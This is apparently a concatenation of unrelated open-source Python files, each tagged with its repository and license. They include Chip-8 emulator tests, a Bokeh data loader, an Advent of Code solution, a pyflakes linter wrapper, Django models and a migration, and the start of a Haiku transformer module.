                    self.assertEqual(self.cpu.registers['v'][0xF], bit_seven)
def test_skip_if_reg_not_equal_reg(self):
for register in range(0x10):
self.cpu.registers['v'][register] = register
for source in range(0x10):
for target in range(0x10):
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.registers['pc'] = 0
self.cpu.skip_if_reg_not_equal_reg()
if source != target:
self.assertEqual(self.cpu.registers['pc'], 2)
else:
self.assertEqual(self.cpu.registers['pc'], 0)
def test_load_index_reg_with_value(self):
for value in range(0x10000):
self.cpu.operand = value
self.cpu.load_index_reg_with_value()
self.assertEqual(self.cpu.registers['index'], value & 0x0FFF)
def test_jump_to_index_plus_value(self):
for index in range(0, 0xFFF, 0x10):
for value in range(0, 0xFFF, 0x10):
self.cpu.registers['index'] = index
self.cpu.registers['pc'] = 0
self.cpu.operand = value
self.cpu.jump_to_index_plus_value()
self.assertEqual(index + value, self.cpu.registers['pc'])
def test_generate_random_number(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
self.cpu.registers['v'][register] = -1
self.cpu.operand = register << 8
self.cpu.operand += value
self.cpu.generate_random_number()
self.assertTrue(self.cpu.registers['v'][register] >= 0)
self.assertTrue(self.cpu.registers['v'][register] <= 255)
def test_move_delay_timer_into_reg(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
self.cpu.timers['delay'] = value
self.cpu.operand = register << 8
self.cpu.registers['v'][register] = 0
self.cpu.move_delay_timer_into_reg()
self.assertEqual(self.cpu.registers['v'][register], value)
def test_move_reg_into_delay_timer(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
self.cpu.registers['v'][register] = value
self.cpu.operand = register << 8
self.cpu.timers['delay'] = 0
self.cpu.move_reg_into_delay_timer()
self.assertEqual(self.cpu.timers['delay'], value)
def test_move_reg_into_sound_timer(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
self.cpu.registers['v'][register] = value
self.cpu.operand = register << 8
self.cpu.timers['sound'] = 0
self.cpu.move_reg_into_sound_timer()
self.assertEqual(self.cpu.timers['sound'], value)
def test_add_reg_into_index(self):
for register in range(0x10):
for index in range(0, 0xFFF, 0x10):
self.cpu.registers['index'] = index
self.cpu.registers['v'][register] = 0x89
self.cpu.operand = (register << 8)
self.cpu.add_reg_into_index()
self.assertEqual(index + 0x89, self.cpu.registers['index'])
def test_load_index_with_reg_sprite(self):
for number in range(0x10):
self.cpu.registers['index'] = 0xFFF
self.cpu.registers['v'][0] = number
self.cpu.operand = 0xF029
self.cpu.load_index_with_reg_sprite()
self.assertEqual(number * 5, self.cpu.registers['index'])
def test_store_bcd_in_memory(self):
for number in range(0x100):
number_as_string = '{:03d}'.format(number)
self.cpu.registers['index'] = 0
self.cpu.registers['v'][0] = number
self.cpu.operand = 0xF033
self.cpu.store_bcd_in_memory()
self.assertEqual(int(number_as_string[0]), self.cpu.memory[0])
self.assertEqual(int(number_as_string[1]), self.cpu.memory[1])
self.assertEqual(int(number_as_string[2]), self.cpu.memory[2])
def test_store_regs_in_memory(self):
for register in range(0x10):
self.cpu.registers['v'][register] = register
self.cpu.operand = (register << 8)
self.cpu.store_regs_in_memory()
self.cpu.registers['index'] = 0
for counter in range(register):
self.assertEqual(counter, self.cpu.memory[counter])
def test_read_regs_from_memory(self):
index = 0x500
self.cpu.registers['index'] = index
for register in range(0xF):
self.cpu.memory[index + register] = register + 0x89
for register in range(0xF):
for reg_to_set in range(0xF):
self.cpu.registers['v'][reg_to_set] = 0
self.cpu.operand = 0xF000
self.cpu.operand += (register << 8)
self.cpu.operand += 0x65
self.cpu.read_regs_from_memory()
for reg_to_check in range(0xF):
if reg_to_check > register:
self.assertEqual(self.cpu.registers['v'][reg_to_check], 0)
else:
self.assertEqual(
self.cpu.registers['v'][reg_to_check],
reg_to_check + 0x89)
def test_store_regs_in_rpl(self):
for register in range(0x10):
self.cpu.registers['v'][register] = register
self.cpu.operand = (register << 8)
self.cpu.store_regs_in_rpl()
for counter in range(register):
self.assertEqual(counter, self.cpu.registers['rpl'][counter])
def test_read_regs_from_rpl(self):
for register in range(0xF):
self.cpu.registers['rpl'][register] = register + 0x89
for register in range(0xF):
for reg_to_set in range(0xF):
self.cpu.registers['v'][reg_to_set] = 0
self.cpu.operand = 0xF000
self.cpu.operand += (register << 8)
self.cpu.operand += 0x85
self.cpu.read_regs_from_rpl()
for reg_to_check in range(0xF):
if reg_to_check > register:
self.assertEqual(self.cpu.registers['v'][reg_to_check], 0)
else:
self.assertEqual(
self.cpu.registers['v'][reg_to_check],
reg_to_check + 0x89)
def test_load_rom(self):
self.cpu.load_rom('test/romfile', 0)
self.assertEqual(ord('a'), self.cpu.memory[0])
self.assertEqual(ord('b'), self.cpu.memory[1])
self.assertEqual(ord('c'), self.cpu.memory[2])
self.assertEqual(ord('d'), self.cpu.memory[3])
self.assertEqual(ord('e'), self.cpu.memory[4])
self.assertEqual(ord('f'), self.cpu.memory[5])
self.assertEqual(ord('g'), self.cpu.memory[6])
def test_decrement_timers_decrements_by_one(self):
self.cpu.timers['delay'] = 2
self.cpu.timers['sound'] = 2
self.cpu.decrement_timers()
self.assertEqual(1, self.cpu.timers['delay'])
self.assertEqual(1, self.cpu.timers['sound'])
def test_decrement_timers_does_not_go_negative(self):
self.cpu.timers['delay'] = 0
self.cpu.timers['sound'] = 0
self.cpu.decrement_timers()
self.assertEqual(0, self.cpu.timers['delay'])
self.assertEqual(0, self.cpu.timers['sound'])
def test_clear_screen(self):
self.cpu.operand = 0xE0
self.cpu.clear_return()
self.screen.clear_screen.assert_called_with()
def test_clear_return_from_subroutine(self):
self.cpu.operand = 0xEE
address = 0x500
self.cpu.memory[self.cpu.registers['sp']] = address & 0x00FF
self.cpu.memory[self.cpu.registers['sp'] + 1] = \
(address & 0xFF00) >> 8
self.cpu.registers['sp'] += 2
self.cpu.registers['pc'] = 0
self.cpu.clear_return()
self.assertEqual(self.cpu.registers['pc'], address)
def test_operation_9E_pc_skips_if_key_pressed(self):
self.cpu.operand = 0x09E
self.cpu.registers['v'][0] = 1
self.cpu.registers['pc'] = 0
result_table = [False] * 512
result_table[pygame.K_4] = True
with mock.patch("pygame.key.get_pressed", return_value=result_table) as key_mock:
self.cpu.keyboard_routines()
self.assertTrue(key_mock.asssert_called)
self.assertEqual(2, self.cpu.registers['pc'])
def test_operation_9E_pc_does_not_skip_if_key_not_pressed(self):
self.cpu.operand = 0x09E
self.cpu.registers['v'][0] = 1
self.cpu.registers['pc'] = 0
result_table = [False] * 512
with mock.patch("pygame.key.get_pressed", return_value=result_table) as key_mock:
self.cpu.keyboard_routines()
self.assertTrue(key_mock.asssert_called)
self.assertEqual(0, self.cpu.registers['pc'])
def test_operation_A1_pc_skips_if_key_not_pressed(self):
self.cpu.operand = 0x0A1
self.cpu.registers['v'][0] = 1
self.cpu.registers['pc'] = 0
result_table = [False] * 512
with mock.patch("pygame.key.get_pressed", return_value=result_table) as key_mock:
self.cpu.keyboard_routines()
self.assertTrue(key_mock.asssert_called)
self.assertEqual(2, self.cpu.registers['pc'])
def test_operation_A1_pc_does_not_skip_if_key_pressed(self):
self.cpu.operand = 0x0A1
self.cpu.registers['v'][0] = 1
self.cpu.registers['pc'] = 0
result_table = [False] * 512
result_table[pygame.K_4] = True
with mock.patch("pygame.key.get_pressed", return_value=result_table) as key_mock:
self.cpu.keyboard_routines()
self.assertTrue(key_mock.asssert_called)
self.assertEqual(0, self.cpu.registers['pc'])
def test_draw_zero_bytes_vf_not_set(self):
self.cpu.operand = 0x00
self.cpu.registers['v'][0xF] = 1
self.cpu.draw_sprite()
self.assertTrue(self.screen.update_screen.assert_called)
self.assertEqual(0, self.cpu.registers['v'][0xF])
def test_execute_instruction_raises_exception_on_unknown_op_code(self):
with self.assertRaises(UnknownOpCodeException) as context:
self.cpu.execute_instruction(operand=0x8008)
self.assertEqual("Unknown op-code: 8008", str(context.exception))
def test_execute_instruction_raises_exception_on_unknown_op_code_from_cpu(self):
with self.assertRaises(UnknownOpCodeException) as context:
self.cpu.operand = 0x8008
self.cpu.execute_instruction(operand=0x8008)
self.assertEqual("Unknown op-code: 8008", str(context.exception))
def test_execute_instruction_on_operand_in_memory(self):
self.cpu.registers['pc'] = 0x200
self.cpu.memory[0x200] = 0x61
result = self.cpu.execute_instruction()
self.assertEqual(0x6100, result)
self.assertEqual(0x202, self.cpu.registers['pc'])
def test_execute_logical_instruction_raises_exception_on_unknown_op_codes(self):
for x in range(8, 14):
self.cpu.operand = x
with self.assertRaises(UnknownOpCodeException):
self.cpu.execute_logical_instruction()
# And finally test 15 (F)
self.cpu.operand = 15
with self.assertRaises(UnknownOpCodeException):
self.cpu.execute_logical_instruction()
def test_misc_routines_raises_exception_on_unknown_op_codes(self):
self.cpu.operand = 0x0
with self.assertRaises(UnknownOpCodeException) as context:
self.cpu.misc_routines()
self.assertEqual("Unknown op-code: 0", str(context.exception))
def test_scroll_down_called(self):
self.cpu.operand = 0x00C4
self.cpu.clear_return()
self.screen.scroll_down.assert_called_with(4)
def test_scroll_right_called(self):
self.cpu.operand = 0x00FB
self.cpu.clear_return()
self.assertTrue(self.screen.scroll_right.assert_called)
def test_scroll_left_called(self):
self.cpu.operand = 0x00FC
self.cpu.clear_return()
self.assertTrue(self.screen.scroll_left.assert_called)
def test_set_extended(self):
self.cpu.operand = 0x00FF
self.cpu.clear_return()
self.assertTrue(self.screen.set_extended.assert_called)
self.assertEqual("extended", self.cpu.mode)
def test_disable_extended(self):
self.cpu.operand = 0x00FE
self.cpu.clear_return()
self.assertTrue(self.screen.set_normal.assert_called)
self.assertEqual("normal", self.cpu.mode)
def test_exit(self):
self.cpu.running = True
self.cpu.operand = 0x00FD
self.cpu.clear_return()
self.assertFalse(self.cpu.running)
def test_draw_extended_called(self):
self.cpu.mode = MODE_EXTENDED
self.cpu.draw_sprite()
self.assertTrue(self.cpu_spy.draw_extended.assert_called)
def test_draw_sprite_draws_correct_sprite(self):
screen = Chip8Screen(2)
screen.init_display()
screen_mock = mock.Mock(wraps=screen, spec=screen)
self.cpu = Chip8CPU(screen_mock)
self.cpu.memory[0] = 0xAA
self.cpu.draw_normal(0, 0, 1)
with patch('chip8.screen.Chip8Screen.draw_pixel'):
screen_mock.draw_pixel.assert_has_calls([
call(0, 0, 1),
call(1, 0, 0),
call(2, 0, 1),
call(3, 0, 0),
call(4, 0, 1),
call(5, 0, 0),
call(6, 0, 1),
call(7, 0, 0)
])
def test_draw_sprite_turns_off_pixels(self):
screen = Chip8Screen(2)
screen.init_display()
screen_mock = mock.Mock(wraps=screen, spec=screen)
self.cpu = Chip8CPU(screen_mock)
self.cpu.memory[0] = 0xAA
self.cpu.draw_normal(0, 0, 1)
self.cpu.draw_normal(0, 0, 1)
with patch('chip8.screen.Chip8Screen.draw_pixel'):
screen_mock.draw_pixel.assert_has_calls([
call(0, 0, 1),
call(1, 0, 0),
call(2, 0, 1),
call(3, 0, 0),
call(4, 0, 1),
call(5, 0, 0),
call(6, 0, 1),
call(7, 0, 0),
call(0, 0, 0),
call(1, 0, 0),
call(2, 0, 0),
call(3, 0, 0),
call(4, 0, 0),
call(5, 0, 0),
call(6, 0, 0),
call(7, 0, 0)
])
def test_draw_sprite_does_not_turn_off_pixels(self):
screen = Chip8Screen(2)
screen.init_display()
screen_mock = mock.Mock(wraps=screen, spec=screen)
self.cpu = Chip8CPU(screen_mock)
self.cpu.memory[0] = 0xAA
self.cpu.draw_normal(0, 0, 1)
self.cpu.memory[0] = 0x55
self.cpu.draw_normal(0, 0, 1)
with patch('chip8.screen.Chip8Screen.draw_pixel'):
screen_mock.draw_pixel.assert_has_calls([
call(0, 0, 1),
call(1, 0, 0),
call(2, 0, 1),
call(3, 0, 0),
call(4, 0, 1),
call(5, 0, 0),
call(6, 0, 1),
call(7, 0, 0),
call(0, 0, 1),
call(1, 0, 1),
call(2, 0, 1),
call(3, 0, 1),
call(4, 0, 1),
call(5, 0, 1),
call(6, 0, 1),
call(7, 0, 1)
])
def test_load_index_with_sprite(self):
self.cpu.registers['v'][1] = 10
self.cpu.operand = 0xF130
self.cpu.load_index_with_extended_reg_sprite()
self.assertEqual(100, self.cpu.registers['index'])
def test_str_function(self):
self.cpu.registers['v'][0] = 0
self.cpu.registers['v'][1] = 1
self.cpu.registers['v'][2] = 2
self.cpu.registers['v'][3] = 3
self.cpu.registers['v'][4] = 4
self.cpu.registers['v'][5] = 5
self.cpu.registers['v'][6] = 6
self.cpu.registers['v'][7] = 7
self.cpu.registers['v'][8] = 8
self.cpu.registers['v'][9] = 9
self.cpu.registers['v'][10] = 10
self.cpu.registers['v'][11] = 11
self.cpu.registers['v'][12] = 12
self.cpu.registers['v'][13] = 13
self.cpu.registers['v'][14] = 14
self.cpu.registers['v'][15] = 15
self.cpu.registers['pc'] = 0xBEEF
self.cpu.operand = 0xBA
self.cpu.registers['index'] = 0xDEAD
result = str(self.cpu)
self.assertEqual(
"PC: BEED OP: BA\nV0: 0\nV1: 1\nV2: 2\nV3: 3\nV4: 4\nV5: 5\nV6: 6"
"\nV7: 7\nV8: 8\nV9: 9\nVA: A\nVB: B\nVC: C\nVD: D\nVE: E\nVF: F\nI: DEAD\n", result)
def test_wait_for_keypress(self):
EventMock = collections.namedtuple('EventMock', 'type')
event_mock = EventMock(type=pygame.KEYDOWN)
self.cpu.operand = 0x0
with mock.patch("pygame.event.wait", return_value=event_mock):
result_table = [False] * 512
result_table[pygame.K_4] = True
with mock.patch("pygame.key.get_pressed", return_value=result_table):
self.cpu.wait_for_keypress()
self.assertEqual(0x1, self.cpu.registers['v'][0])
# M A I N #####################################################################
if __name__ == '__main__':
unittest.main()
# E N D O F F I L E #######################################################
| craigthomas/Chip8Python | test/test_chip8cpu.py | Python | mit | 32,960 |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2020, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
'''
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from ..util.sampledata import package_csv
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'data',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
def _read_data():
    '''
    Read the commits sample data into a pandas DataFrame.

    The packaged CSV has no header and columns (day, datetime); the
    datetime column becomes the index, parsed as UTC and converted to
    US/Central, and a 'time' column holding the time-of-day is added.
    '''
    from ..util.dependencies import import_required
    module = 'commits'
    pd = import_required('pandas', '%s sample data requires Pandas (http://pandas.pydata.org) to be installed' % module)
    data = package_csv(module, 'commits.txt.gz', parse_dates=True, header=None, names=['day', 'datetime'], index_col='datetime')
    # Strip tz via astype, then re-localize to UTC before converting, so
    # the index ends up tz-aware in US/Central.
    data.index = pd.to_datetime(data.index, utc=True,).astype('datetime64[ns]').tz_localize('utc').tz_convert('US/Central')
    data['time'] = data.index.time
    return data
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
data = _read_data()
| ericmjl/bokeh | bokeh/sampledata/commits.py | Python | bsd-3-clause | 2,253 |
import os
import sys
def main():
    """
    Rebuild an input file for relabeling from a previous submission.

    Reads the previous submission's ``.empty`` file (assignments whose
    results were empty), looks up each assignment's image URL in the
    matching ``.results`` file, and writes those URLs to the new input
    file given as the first command-line argument.

    Raises:
        ValueError: when the argument does not look like an input path, or
            when an assignment does not have exactly one result line.
    """
    input_file = sys.argv[1]
    # Validate with an explicit raise: 'assert' is stripped under -O.
    if 'input' not in input_file:
        raise ValueError("expected an 'input' path, got %r" % input_file)
    # Derive the original submission directory from the redo input path.
    old_dir = input_file.replace('-redo', '').replace('/input', '').rstrip('/')
    old_empty_file = old_dir + '/' + os.path.basename(old_dir) + '.empty'
    with open(old_empty_file) as fh:
        # First line is a header; the first column is the assignment ID.
        assignmentIDs = [line.split()[0] for line in fh.readlines()[1:]]
    old_results_file = old_empty_file.replace('.empty', '.results')
    with open(old_results_file) as fh:
        results = fh.readlines()
    inputs = ['urls\n']
    for aid in assignmentIDs:
        matches = [result for result in results if aid in result]
        if len(matches) != 1:
            raise ValueError('expected exactly one result for %s, found %d'
                             % (aid, len(matches)))
        # The image URL is the whitespace-separated token containing '.jpeg'.
        input_line = [r.replace('"', '') + '\n' for r in matches[0].split()
                      if '.jpeg' in r][0]
        inputs.append(input_line)
    with open(input_file, 'w') as fh:
        fh.writelines(inputs)
if __name__ == '__main__':
main()
| andriluka/mechturk-public | utils/redo_input_from_empty.py | Python | bsd-3-clause | 1,074 |
def First_Part(orbits):
    """Return the orbit-count checksum: total direct + indirect orbits.

    Arguments:
        orbits: iterable of 'CENTER)SATELLITE' strings.

    The original walked each chain with ``while 1`` and a KeyError handler
    (exception-driven control flow); a membership test on the parent map
    is clearer and behaves identically.
    """
    parents = {}
    for orbit in orbits:
        center, satellite = orbit.split(')')
        parents[satellite] = center
    checksum = 0
    for obj in parents:
        # Walk up to COM; each hop is one direct or indirect orbit.
        node = obj
        while node in parents:
            node = parents[node]
            checksum += 1
    return checksum
def Second_Part(orbits):
    """Return the minimum number of orbital transfers from YOU to SAN.

    Breadth-first search over the undirected orbit graph, starting at the
    object YOU orbits, until SAN appears in the frontier; the answer is
    the BFS depth minus one (SAN itself is not a transfer).

    The original re-queued already-visited parents without bound, blowing
    up the frontier with duplicates on deep chains; a visited set keeps
    the search linear while yielding the same distance.
    """
    parents = {}
    for orbit in orbits:
        center, satellite = orbit.split(')')
        parents[satellite] = center
    visited = {"YOU"}
    frontier = [parents["YOU"]]
    dist = 0
    while "SAN" not in frontier:
        nxt = []
        for obj in frontier:
            if obj in visited:
                continue
            visited.add(obj)
            if obj != "COM":
                nxt.append(parents[obj])
            nxt.extend(child for child, center in parents.items()
                       if center == obj and child not in visited)
        frontier = nxt
        dist += 1
    return dist - 1
# Worked example from the puzzle description. NOTE: immediately overwritten
# by the real puzzle input below, so it serves only as documentation.
Orbits = '''COM)B
B)C
C)D
D)E
E)F
B)G
G)H
D)I
E)J
J)K
K)L
K)YOU
I)SAN'''.split('\n')
# Real puzzle input: one orbit per line; drop the trailing empty line.
Orbits = open("Inputs/Day_06.txt", 'r').read().split('\n')[:-1]
print(First_Part(Orbits))
print(Second_Part(Orbits))
| ImpregnableProgrammer/Advent-of-Code | 2019/Day_06.py | Python | gpl-3.0 | 1,071 |
# Example: simple linear regression with spm1d, cross-checked against
# scipy.stats.linregress on the same data.
import numpy as np
from scipy import stats
import spm1d
# (0) Load dataset (the second assignment overrides the first; only the
#     Columbia head-circumference data is actually analyzed):
dataset = spm1d.data.uv0d.regress.RSRegression()
dataset = spm1d.data.uv0d.regress.ColumbiaHeadCircumference()
y,x = dataset.get_data()
print( dataset )
# (1) Conduct the regression test using spm1d and report its inference:
spmt = spm1d.stats.regress(y, x)
spmti = spmt.inference(0.05, two_tailed=True)
print( spmti )
# (2) Compare to the scipy.stats result; the t statistic is recomputed
#     from the correlation r via t = r * sqrt((n - 2) / (1 - r^2)).
slope,intercept,r,p,se = stats.linregress(x, y)
t = r * ((y.size-2)/(1-r*r) )**0.5
print( 'scipy.stats result:\n r = %.5f\n t = %.5f\n p = %.5f' %(r,t,p) )
| 0todd0000/spm1d | spm1d/examples/scipy/ex_regression.py | Python | gpl-3.0 | 577 |
# -*- coding: utf8 -*-
# Copyright (C) 2013 - Oscar Campos <oscar.campos@member.fsf.org>
# This program is Free Software see LICENSE file for details
import re
import _ast
from linting import linter
import pyflakes.checker as pyflakes
# Patch pyflakes messages so str() renders the formatted text; the linter
# below relies on this when storing str(error) as 'raw_error'.
pyflakes.messages.Message.__str__ = (
    lambda self: self.message % self.message_args
)
class PyFlakesError(pyflakes.messages.Message):
    """Lint error base class

    Extends the pyflakes Message with an explicit severity level and a
    message/format-args pair (rendered by the patched __str__ above).
    """

    def __init__(self, filename, loc, level, message, message_args, **kwargs):
        super(PyFlakesError, self).__init__(filename, loc)
        # severity level, e.g. 'E' or 'W'
        self.level = level
        # printf-style message template and its arguments
        self.message = message
        self.message_args = message_args
class PyFlakesLinter(linter.Linter):
"""Linter for PyFlakes Linter
"""
    def lint(self, settings, code, filename):
        """Run the pyflakes code checker with the given options

        Arguments:
            settings: mapping of linter options (pyflakes_ignore,
                pyflakes_disabled, pyflakes_explicit_ignore, use_pylint).
            code: source text to check.
            filename: name reported with the errors.

        Returns the parsed error list; empty when pyflakes is disabled or
        pylint is selected instead.
        """
        errors = []
        pyflakes_ignore = settings.get('pyflakes_ignore', None)
        pyflakes_disabled = settings.get('pyflakes_disabled', False)
        explicit_ignore = settings.get('pyflakes_explicit_ignore', [])
        if not pyflakes_disabled and not settings.get('use_pylint'):
            errors.extend(self.check(code, filename, pyflakes_ignore))
        return self.parse(errors, explicit_ignore)
def check(self, code, filename, ignore=None):
"""Check the code with pyflakes to find errors
"""
class FakeLoc:
lineno = 0
try:
code = code.encode('utf8') + b'\n'
tree = compile(code, filename or '', 'exec', _ast.PyCF_ONLY_AST)
except (SyntaxError, IndentationError):
return self._handle_syntactic_error(code, filename)
except ValueError as error:
return [PyFlakesError(filename, FakeLoc(), error.args[0])]
else:
# the file is syntactically valid, check it now
w = pyflakes.Checker(tree, filename, ignore)
return w.messages
def parse(self, errors, explicit_ignore):
"""Parse the errors returned from the PyFlakes library
"""
error_list = []
if errors is None:
return error_list
errors.sort(key=linter.cmp_to_key(lambda a, b: a.lineno < b.lineno))
for error in errors:
error_level = 'W' if not hasattr(error, 'level') else error.level
message = error.message.capitalize()
error_data = {
'underline_range': False,
'level': error_level,
'lineno': error.lineno,
'message': message,
'raw_error': str(error)
}
if hasattr(error, 'offset'):
error_data['offset'] = error.offset
elif hasattr(error, 'col'):
error_data['offset'] = error.col
if (isinstance(error, (linter.OffsetError))):
error_data['underline_range'] = True
error_list.append(error_data)
elif (isinstance(
error, (
pyflakes.messages.RedefinedWhileUnused,
pyflakes.messages.UndefinedName,
pyflakes.messages.UndefinedExport,
pyflakes.messages.UndefinedLocal,
pyflakes.messages.UnusedVariable)) and
error.__class__.__name__ not in explicit_ignore):
error_data['len'] = len(error.message_args[0])
error_data['regex'] = (
r'((and|or|not|if|elif|while|in)\s+|[+\-*^%%<>=\(\{{])*\s'
'*(?P<underline>[\w\.]*{0}[\w]*)'.format(re.escape(
error.message_args[0]
))
)
error_list.append(error_data)
elif isinstance(error, pyflakes.messages.ImportShadowedByLoopVar):
regex = 'for\s+(?P<underline>[\w]*{0}[\w*])'.format(
re.escape(error.message_args[0])
)
error_data['regex'] = regex
error_list.append(error_data)
elif (isinstance(
error, (
pyflakes.messages.UnusedImport,
pyflakes.messages.ImportStarUsed)) and
error.__class__.__name__ not in explicit_ignore):
if isinstance(error, pyflakes.messages.ImportStarUsed):
word = '*'
else:
word = error.message_args[0]
linematch = '(from\s+[\w_\.]+\s+)?import\s+(?P<match>[^#;]+)'
r = '(^|\s+|,\s*|as\s+)(?P<underline>[\w]*{0}[\w]*)'.format(
re.escape(word)
)
error_data['regex'] = r
error_data['linematch'] = linematch
error_list.append(error_data)
elif (isinstance(error, pyflakes.messages.DuplicateArgument) and
error.__class__.__name__ not in explicit_ignore):
regex = 'def [\w_]+\(.*?(?P<underline>[\w]*{0}[\w]*)'.format(
re.escape(error.message_args[0])
)
error_data['regex'] = regex
error_list.append(error_data)
elif isinstance(error, pyflakes.messages.LateFutureImport):
pass
elif isinstance(error, linter.PythonError):
print(error)
else:
print(
'Ooops, we missed an error type for pyflakes', type(error)
)
return error_list
| alexfalcucc/anaconda | anaconda_lib/linting/anaconda_pyflakes.py | Python | gpl-3.0 | 5,568 |
from django.db import models
class Utilisateur(models.Model):
    # Application user account.
    pseudo = models.CharField(max_length=12)
    # NOTE(review): password ("mdp") is stored as a plain CharField; no
    # hashing is visible here -- confirm hashing happens before save.
    mdp = models.CharField(max_length=12)
    mail = models.CharField(max_length=20)
class Amis(models.Model):
    # Directed friendship link: "utilisateur" has "amisde" as a friend.
    # Two foreign keys to the same model need distinct related_name
    # values, otherwise Django's system check fails with a reverse
    # accessor clash (fields.E304) and migrations cannot run.
    utilisateur = models.ForeignKey(Utilisateur,on_delete=models.CASCADE,related_name='amis')
    amisde = models.ForeignKey(Utilisateur,on_delete=models.CASCADE,related_name='amis_de')
class Question(models.Model):
    # A question posted by a user; deleted together with its author.
    intitule = models.CharField(max_length=200)
    utilisateur = models.ForeignKey(Utilisateur,on_delete=models.CASCADE)
class Reponse(models.Model):
    # An answer to a Question; deleted with its author or its question.
    intitule = models.CharField(max_length=200)
    utilisateur = models.ForeignKey(Utilisateur,on_delete=models.CASCADE)
    question = models.ForeignKey(Question,on_delete=models.CASCADE)
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
from django.conf import settings
import djangobmf.fields
class Migration(migrations.Migration):
    """Initial schema for the djangobmf invoice app.

    Creates the Invoice header model, the InvoiceProduct line-item
    (through) model, and the M2M/FK fields linking them to products.
    """
    # Referenced models are swappable, so depend on the implementations
    # configured in settings rather than on concrete apps.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        migrations.swappable_dependency(settings.BMF_CONTRIB_TRANSACTION),
        migrations.swappable_dependency(settings.BMF_CONTRIB_ADDRESS),
        migrations.swappable_dependency(settings.BMF_CONTRIB_PRODUCT),
    ]
    operations = [
        # Invoice: document header (number, dates, addresses, workflow state).
        migrations.CreateModel(
            name='Invoice',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('modified', models.DateTimeField(auto_now=True, verbose_name='Modified', null=True)),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created', null=True)),
                ('uuid', models.CharField(editable=False, max_length=100, blank=True, null=True, verbose_name='UUID', db_index=True)),
                ('state', djangobmf.fields.OLDWorkflowField(db_index=True, max_length=32, null=True, editable=False, blank=True)),
                ('invoice_number', models.CharField(max_length=255, null=True, verbose_name='Invoice number')),
                ('net', models.FloatField(null=True, editable=False, blank=True)),
                ('date', models.DateField(null=True, verbose_name='Date')),
                ('due', models.DateField(null=True, verbose_name='Due', blank=True)),
                ('notes', models.TextField(null=True, verbose_name='Notes', blank=True)),
                ('term_of_payment', models.TextField(null=True, verbose_name='Term of payment', blank=True)),
                ('created_by', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True, related_name="+")),
                ('invoice_address', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, to=settings.BMF_CONTRIB_ADDRESS, null=True, related_name="quotation_invoice")),
                ('modified_by', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True, related_name="+")),
                ('shipping_address', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, to=settings.BMF_CONTRIB_ADDRESS, null=True, related_name="shipping_invoice")),
                ('transaction', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, blank=True, editable=False, to=settings.BMF_CONTRIB_TRANSACTION, null=True, related_name="transation_invoice")),
            ],
            options={
                'ordering': ['invoice_number'],
                'abstract': False,
                'verbose_name': 'Invoice',
                'verbose_name_plural': 'Invoices',
            },
            bases=(models.Model,),
        ),
        # InvoiceProduct: one line item (price, amount, description).
        migrations.CreateModel(
            name='InvoiceProduct',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=255, null=True, verbose_name='Name')),
                ('price', djangobmf.fields.MoneyField(verbose_name='Price', max_digits=27, decimal_places=9)),
                ('price_currency', djangobmf.fields.CurrencyField(default=djangobmf.fields.get_default_currency, max_length=4, null=True, editable=False)),
                ('price_precision', models.PositiveSmallIntegerField(default=0, null=True, editable=False, blank=True)),
                ('amount', models.FloatField(default=1.0, null=True, verbose_name='Amount')),
                ('description', models.TextField(null=True, verbose_name='Description', blank=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        # The invoice<->product M2M goes through InvoiceProduct.
        migrations.AddField(
            model_name='invoice',
            name='products',
            field=models.ManyToManyField(to=settings.BMF_CONTRIB_PRODUCT, through='djangobmf_invoice.InvoiceProduct'),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='invoiceproduct',
            name='invoice',
            field=models.ForeignKey(related_name='invoice_products', null=True, blank=True, to='djangobmf_invoice.Invoice'),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='invoiceproduct',
            name='product',
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='invoice_products', null=True, blank=True, to='djangobmf_product.Product'),
            preserve_default=True,
        ),
    ]
| django-bmf/django-bmf | djangobmf/contrib/invoice/migrations/0001_initial.py | Python | bsd-3-clause | 4,828 |
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Transformer model components."""
from typing import Optional
import haiku as hk
import jax
import jax.numpy as jnp
import numpy as np
class CausalSelfAttention(hk.MultiHeadAttention):
